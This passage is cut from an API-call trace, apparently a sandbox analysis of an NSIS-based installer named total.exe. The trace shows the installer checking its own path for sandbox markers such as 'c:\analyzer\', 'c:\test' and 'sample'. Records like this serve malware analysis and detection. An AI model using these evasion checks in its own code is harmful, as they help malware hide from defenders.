returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.902] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.902] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.902] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.902] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\analyzer\\')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\analyzer\\')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\analyzer\\')i.R0 ?c" [0157.902] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.902] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.902] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.902] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.902] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.902] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.902] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.902] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.902] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.902] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\analyzer\\", iMaxLength=1024 | out: lpString1="c:\\analyzer\\") returned="c:\\analyzer\\" [0157.902] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.903] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.903] lstrlenA (lpString="strstr") returned 6 [0157.903] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.903] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.903] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.903] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\analyzer\\", iMaxLength=1024 | out: lpString1="c:\\analyzer\\") returned="c:\\analyzer\\" [0157.903] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.903] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\analyzer\\") returned 0x0 [0157.903] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\analyzer\\", iMaxLength=1024 | out: lpString1="c:\\analyzer\\") returned="c:\\analyzer\\" [0157.903] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.903] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.903] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.903] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.903] lstrlenA (lpString="0") returned 1 [0157.903] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.903] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.903] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.903] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.903] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.903] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.903] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.903] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.904] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.904] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.904] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.904] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\test')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\test')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\test')i.R0 ?c" [0157.904] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.904] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.904] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.904] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.904] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.904] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.904] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.904] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.904] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.904] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\test", iMaxLength=1024 | out: lpString1="c:\\test") returned="c:\\test" [0157.904] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.905] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.905] lstrlenA (lpString="strstr") returned 6 [0157.905] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.905] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.905] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.905] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\test", iMaxLength=1024 | out: lpString1="c:\\test") returned="c:\\test" [0157.905] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.905] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\test") returned 0x0 [0157.905] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\test", iMaxLength=1024 | out: lpString1="c:\\test") returned="c:\\test" [0157.905] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.905] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.905] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.905] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.905] lstrlenA (lpString="0") returned 1 [0157.905] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.905] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.905] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.905] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.905] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.905] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.905] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.906] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.906] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.906] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.906] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.906] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\ohcbulyb.exe')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\ohcbulyb.exe')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\ohcbulyb.exe')i.R0 ?c" [0157.906] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.906] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.906] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.906] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.906] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.907] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.907] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.907] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.907] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.907] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\ohcbulyb.exe", iMaxLength=1024 | out: lpString1="c:\\ohcbulyb.exe") returned="c:\\ohcbulyb.exe" [0157.907] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.907] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.907] lstrlenA (lpString="strstr") returned 6 [0157.907] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.907] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.907] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.908] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\ohcbulyb.exe", iMaxLength=1024 | out: lpString1="c:\\ohcbulyb.exe") returned="c:\\ohcbulyb.exe" [0157.908] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.908] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\ohcbulyb.exe") returned 0x0 [0157.908] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\ohcbulyb.exe", iMaxLength=1024 | out: lpString1="c:\\ohcbulyb.exe") returned="c:\\ohcbulyb.exe" [0157.908] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.908] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.908] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.908] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.908] lstrlenA (lpString="0") returned 1 [0157.908] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.908] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.908] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.908] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.909] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.909] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.909] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.909] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.909] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.909] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.909] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.909] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'sample')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'sample')i.R0 ?c") returned="ntdll::strstr(t R1, t 'sample')i.R0 ?c" [0157.909] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.909] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.909] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.910] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.910] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.910] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.910] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.910] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.910] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.910] lstrcpynA (in: lpString1=0x323058, lpString2="sample", iMaxLength=1024 | out: lpString1="sample") returned="sample" [0157.910] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.911] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.911] lstrlenA (lpString="strstr") returned 6 [0157.911] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.911] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.911] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.911] lstrcpynA (in: lpString1=0x3217a0, lpString2="sample", iMaxLength=1024 | out: lpString1="sample") returned="sample" [0157.911] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.911] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="sample") returned 0x0 [0157.911] lstrcpynA (in: lpString1=0x314820, lpString2="sample", iMaxLength=1024 | out: lpString1="sample") returned="sample" [0157.911] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.911] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.911] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.912] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.912] lstrlenA (lpString="0") returned 1 [0157.912] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.912] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.912] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.912] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.912] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.912] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.912] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.912] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.912] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.912] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: 